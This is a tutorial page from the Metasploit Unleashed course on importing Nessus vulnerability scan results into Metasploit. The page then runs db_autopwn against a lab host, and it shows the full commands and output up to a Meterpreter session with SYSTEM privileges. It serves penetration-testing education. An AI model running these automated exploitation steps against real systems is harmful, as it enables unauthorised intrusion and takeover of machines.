Working With Nessus
From Metasploit Unleashed
Nessus is a well known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security. There is also a spin off project of Nessus 2, named OpenVAS, that is published under the GPL. Utilizing a large number of vulnerability checks, called plugins in Nessus, you can identify a large number of well known vulnerablities. Metasploit will accept vulnerability scan result files from both Nessus and OpenVAS in the nbe file format.
Lets walk through the process. First we complete a scan from Nessus 4:
Upon completion of a vulnerability scan, we save the results in nbe format and then start the msfconsole. Next, we need to create a new database to read the results file into.
root@bt:/pentest/exploits/framework3# ./msfconsole ... msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db msf > load db_tracker [*] Successfully loaded plugin: db_tracker msf >
We have now created the database. Next, lets take a look at the 'help' command, which presents many more options.
msf > help ...snip... Database Backend Commands ========================= Command Description ------- ----------- db_add_host Add one or more hosts to the database db_add_note Add a note to host db_add_port Add a port to host db_autopwn Automatically exploit everything db_connect Connect to an existing database db_create Create a brand new database db_del_host Delete one or more hosts from the database db_del_port Delete one port from the database db_destroy Drop an existing database db_disconnect Disconnect from the current database instance db_driver Specify a database driver db_hosts List all hosts in the database db_import_amap_mlog Import a THC-Amap scan results file (-o -m) db_import_nessus_nbe Import a Nessus scan result file (NBE) db_import_nessus_xml Import a Nessus scan result file (NESSUS) db_import_nmap_xml Import a Nmap scan results file (-oX) db_nmap Executes nmap and records the output automatically db_notes List all notes in the database db_services List all services in the database db_vulns List all vulnerabilities in the database msf >
So lets go ahead and import the nbe results file by issuing the 'db_import_nessus_nbe' command followed by the path to our results file. After importing the results file, we can execute the 'hosts' command to list the hosts that are in the nbe results file.
msf > db_import_nessus_nbe /root/docs/115_scan.nbe msf > hosts [*] Time: Tue Jul 14 17:40:23 -0600 2009 Host: 192.168.1.115 Status: alive OS:
We see exactly what we were expecting to see. Next we execute the 'services' command which will enumerate all of the services that were detected running on the scanned system.
msf > services [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=135 proto=tcp state=up name=epmap [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=139 proto=tcp state=up name=netbios-ssn [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=445 proto=tcp state=up name=microsoft-ds [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=22 proto=tcp state=up name=ssh [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=137 proto=udp state=up name=netbios-ns [*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=123 proto=udp state=up name=ntp
Finally, and most importantly, the 'vulns' command will list all of the vulnerabilities that were reported by Nessus and recorded in the results file.
msf > vulns [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=22 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.50282 refs=NSS-1.3.6.1.4.1.25623.1.0.50282 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=139 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=137 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10150 refs=NSS-1.3.6.1.4.1.25623.1.0.10150,CVE-1999-0621 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.10394 refs=NSS-1.3.6.1.4.1.25623.1.0.10394 [*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=123 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10884 refs=NSS-1.3.6.1.4.1.25623.1.0.10884
All of this enumeration and parsing is leading up to something...db_autopwn. db_autopwn will read all of the ports, services, and vulnerabilities contained within the nbe results file, match exploits that are compatible with them, and try to exploit them all automagically. Running 'db_autopwn -h' will list all of the options that are available.
msf > db_autopwn -h [*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port -q Disable exploit module output -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex
We will run 'db_autopwn -x -e' to select exploit modules based on vulnerability (instead of just by port as would happen with just nmap results) and exploit all targets. db_autopwn is not a stealthy tool by any means and by default, uses a reverse Meterpreter shell. Lets see what happens when we run it.
msf > db_autopwn -x -e [*] (8/38): Launching exploit/multi/samba/nttrans against 192.168.1.115:139... [*] (9/38): Launching exploit/windows/smb/psexec against 192.168.1.115:445... [*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.115:445... [-] Exploit failed: The connection was refused by the remote host (192.168.1.115:22). [*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.115:445... [*] Started bind handler [-] Exploit failed: No encoders encoded the buffer successfully. msf > [*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:192.168.1.115[alert] ... [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.115[lsarpc]... [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (192.168.1.101:40814 -> 192.168.1.115:14198)
Very nice! db_autopwn has successfully exploited the host and has a Meterpreter shell waiting for us. The 'sessions -l' command will list the open sessions available while 'sessions -i ' will allow us to interact with that session ID.
msf > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.101:40814 -> 192.168.1.115:14198 msf > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: DOOKIE-FA154354 OS : Windows XP (Build 2600, Service Pack 2). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
As you can see, this is a very powerful feature. It won't catch everything on the remote system, and will be very noisy, but there is a time and place for noise the same as there is for stealth. This demonstrates the versatility of the framework, and some of the many possibilities for integration with other tools that are possible.
Vulnerability Scanning > Working With Nessus
SMB Login Check | VNC Authentication | Open X11 | WMAP Web Scanner | Working With NeXpose | Working With Nessus | Using The Database
